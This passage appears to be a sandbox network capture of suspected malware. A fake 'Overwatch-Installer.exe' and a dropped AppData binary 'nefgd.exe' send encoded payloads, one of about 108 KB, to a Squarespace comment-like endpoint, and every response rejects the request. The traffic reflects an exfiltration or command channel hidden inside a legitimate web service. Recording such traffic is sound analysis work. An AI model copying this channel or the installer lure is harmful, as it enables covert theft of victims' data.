2024-09-01 20:05:00 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 50 7a 75 5a 6d 5a 38 74 41 44 2f 31 6b 30 38 53 39 37 76 35 78 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2PzuZmZ8tAD/1k08S97v5xqif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:05:00 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeFHy8wHN6cnMWQ2OWEyODFlZmQ2OTJhYjUxMDA0YTMwNzI4MWVh; Path=/; Secure Set-Cookie: crumb=BUYpLrL8BR8hMmZkZjNjYzJmOGUxZDBjMzM3ZDQyNzNiYmI5YWVi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SHpCfIZS/MO9z30Gd Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUYpLrL8BR8hMmZkZjNjYzJmOGUxZDBjMzM3ZDQyNzNiYmI5YWVi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	49855	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:00 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaLTZO_2plCLMmZiZTE3YmE3ZTNjOGIzZWQ4MDMyMzAxMmZjYWVm; Path=/; Secure Set-Cookie: crumb=BdKdfeT_zyM5MzU1YjdiOWYyNTYxYWZmZDE5MDhmZTFhN2Y0OTY4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WRw2JRvA/1JeZ0e91 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdKdfeT_zyM5MzU1YjdiOWYyNTYxYWZmZDE5MDhmZTFhN2Y0OTY4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	49856	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 4e 35 30 76 39 61 4c 74 46 69 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTN50v9aLtFiQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:05:00 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:05:00 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:05:00 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:05:00 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:05:00 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSc0bIN0n7LDNTU3ODE0ODI5NWU1NmE0MzVmY2FkOWIwYmEwYzYy; Path=/; Secure Set-Cookie: crumb=BXvBsfHdSqr6MmRlOTZhZTdkZDdlNDA3N2FjZWQwMGE2MDA2YTRl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: JUKPcScQ/uIcLFpsr Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXvBsfHdSqr6MmRlOTZhZTdkZDdlNDA3N2FjZWQwMGE2MDA2YTRl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	49858	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bd-awLH1A7FaYWVmOGM4MmQ3Y2RmNGQ1MzlhMjI1MWRjNzY0NmQ4; Path=/; Secure Set-Cookie: crumb=BQAveWSa4HsSNjFjZjFhYWU1YzE1NmNmOTlmMzJjMjQ1NzFmNzE0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: sFfCXQOi/IiJMGA4e Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQAveWSa4HsSNjFjZjFhYWU1YzE1NmNmOTlmMzJjMjQ1NzFmNzE0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	49857	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdYRojRzbY3ONjVhMjE0NzRlZmE3ZjJkZTg2YzRjNTMxYzYxYTMw; Path=/; Secure Set-Cookie: crumb=BXerHLr0Cbk9Yjk3ZjE0ZjQzNTc4NWNjN2VlMjZkYzc5ZWQ3MWJm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: whJq3zPF/iZk3vQAL Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXerHLr0Cbk9Yjk3ZjE0ZjQzNTc4NWNjN2VlMjZkYzc5ZWQ3MWJm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49859	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYa2n0dLVe6hODg5MzE1ZWU1OTcwZWJhN2ZjNDg1YzhhMDA2YzIy; Path=/; Secure Set-Cookie: crumb=BTPS4k_UGbXkZjVkNDE4NGE5Y2JlZWJjMTgwOWJlNTc2YjA1ZGU1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2q1Ul0IE/Cim9dZz0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTPS4k_UGbXkZjVkNDE4NGE5Y2JlZWJjMTgwOWJlNTc2YjA1ZGU1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49860	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:01 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:01 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bct_FCGM7HK7MzJiYjAwNGQyZDMxODE3MmVmZTNjOTgzZDU5ZTJh; Path=/; Secure Set-Cookie: crumb=BWoX8hKX85isZWRjZWY3MTY1NmE3YmVhMDljODRkYTBmYWZiNGQ0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: sesJqhMP/X6AXjAFc Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWoX8hKX85isZWRjZWY3MTY1NmE3YmVhMDljODRkYTBmYWZiNGQ0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	49862	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
